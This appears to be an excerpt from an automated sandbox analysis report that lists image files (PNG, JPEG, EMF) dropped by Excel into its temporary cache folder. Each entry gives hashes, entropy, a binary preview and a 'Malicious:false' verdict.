                                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DDAF228.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):79394
                                                                    Entropy (8bit):7.864111100215953
                                                                    Encrypted:false
                                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36823C09.jpeg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):29499
                                                                    Entropy (8bit):7.667442162526095
                                                                    Encrypted:false
                                                                    SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                                                    MD5:4FBDDF16124B6C9368537DF70A238C14
                                                                    SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                                                    SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                                                    SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                                                    Malicious:false
                                                                    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37086ED0.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):50311
                                                                    Entropy (8bit):7.960958863022709
                                                                    Encrypted:false
                                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                    Malicious:false
                                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CDE61C7.jpeg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):29499
                                                                    Entropy (8bit):7.667442162526095
                                                                    Encrypted:false
                                                                    SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                                                    MD5:4FBDDF16124B6C9368537DF70A238C14
                                                                    SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                                                    SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                                                    SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                                                    Malicious:false
                                                                    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EAF411C.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):49744
                                                                    Entropy (8bit):7.99056926749243
                                                                    Encrypted:true
                                                                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                    Malicious:false
                                                                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49FD4D5E.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):79394
                                                                    Entropy (8bit):7.864111100215953
                                                                    Encrypted:false
                                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                    Malicious:false
                                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AC0AF44.emf
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):7608
                                                                    Entropy (8bit):5.0883971365678695
                                                                    Encrypted:false
                                                                    SSDEEP:96:+Scw4zLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5cw44+sW31RGtdVDYM3VfmkpH
                                                                    MD5:1DCD2699428439328B8F8158BDDD95AF
                                                                    SHA1:128D12CBA01BA939CBF5749D59DAF73F457896BA
                                                                    SHA-256:3DC3543E4169A1A2A04DECB711F746F548A55ACF29CC5E94C5561C580835C104
                                                                    SHA-512:943D4AFDA65D1BEAF9D1645C2B2C5E1A9F5297658D364BC076ED26569B78F476A577FA20DB562F39DDF7A23DE83A83E9453350F83753C4A1A2CE1B978DCFEA71
                                                                    Malicious:false
                                                                    Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....W.d...................$.S...S.'.q....\...$.S.....$.S...S.W.q....$.S..6Ov_.q......q....Dy.w......{.....H.S....w....$.......d.........S.J^.q.... ^.q`.........i...{.-...t.S..<.w................<..v.Zfv....X.1n..............................gvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E93766D.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):84203
                                                                    Entropy (8bit):7.979766688932294
                                                                    Encrypted:false
                                                                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                    Malicious:false
                                                                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96B46D4B.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):84203
                                                                    Entropy (8bit):7.979766688932294
                                                                    Encrypted:false
                                                                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                    Malicious:false
                                                                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9725E68F.emf
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):7608
                                                                    Entropy (8bit):5.091127811854214
                                                                    Encrypted:false
                                                                    SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
                                                                    MD5:EB06F07412A815AED391F20298C1087B
                                                                    SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
                                                                    SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
                                                                    SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
                                                                    Malicious:false
                                                                    Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I....................................................v.Ze..............%f^..................Y...Y.'.wq....\.....Y.......Y.@.Y.W.wq......Y..6.v_.wq......wq.Ze.4.g^..Y...f^0.g^......g^..f^........4.g^@.Y...f^......f^..........g^..Y.......g^4tf^..g^............<..u.Z.v.....Ze......Ze........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF41FE75.emf
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):7592
                                                                    Entropy (8bit):5.454640002047622
                                                                    Encrypted:false
                                                                    SSDEEP:96:zncw4zcqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwi:bcw4oSTxK/LA/FVoL3QtKhn+e3+wi
                                                                    MD5:0B7AB720BBD945ABEA038779107CB7C5
                                                                    SHA1:977FC667A0F3E46FA669F6D984819192656A3F54
                                                                    SHA-256:D89A16975BF224EA0B0431ABF2FCECAA5B8992AF2C79FFBCD80EF0D7F651A63F
                                                                    SHA-512:C49269DD89B12236E2992DDDBE4E56E6F2FD6EA9E3D6DE7D12EB32C0D68F56E946399A0BE0A5BD3CF7F0DF68E51152A1EDFE22AAA2DD33DB7AF2925F1AAE6ADA
                                                                    Malicious:false
                                                                    Preview: ....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....W.d...................$.S...S.'.q....\...$.S.....$.S...S.W.q....$.S..6Ov_.q......q....Dy.w......{.....H.S....w....$.......d.........S.J^.q.... ^.q`.........i...{.-...t.S..<.w................<..v.Zfv....X.1n..............................gvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2989F2.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):49744
                                                                    Entropy (8bit):7.99056926749243
                                                                    Encrypted:true
                                                                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                    Malicious:false
                                                                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7AB3B46.emf
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):648132
                                                                    Entropy (8bit):2.8124530118203914
                                                                    Encrypted:false
                                                                    SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                                                                    MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                                                                    SHA1:F677467423105ACF39B76CB366F08152527052B3
                                                                    SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                                                                    SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                                                                    Malicious:false
                                                                    Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9E48091.jpeg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):8815
                                                                    Entropy (8bit):7.944898651451431
                                                                    Encrypted:false
                                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                    Malicious:false
                                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
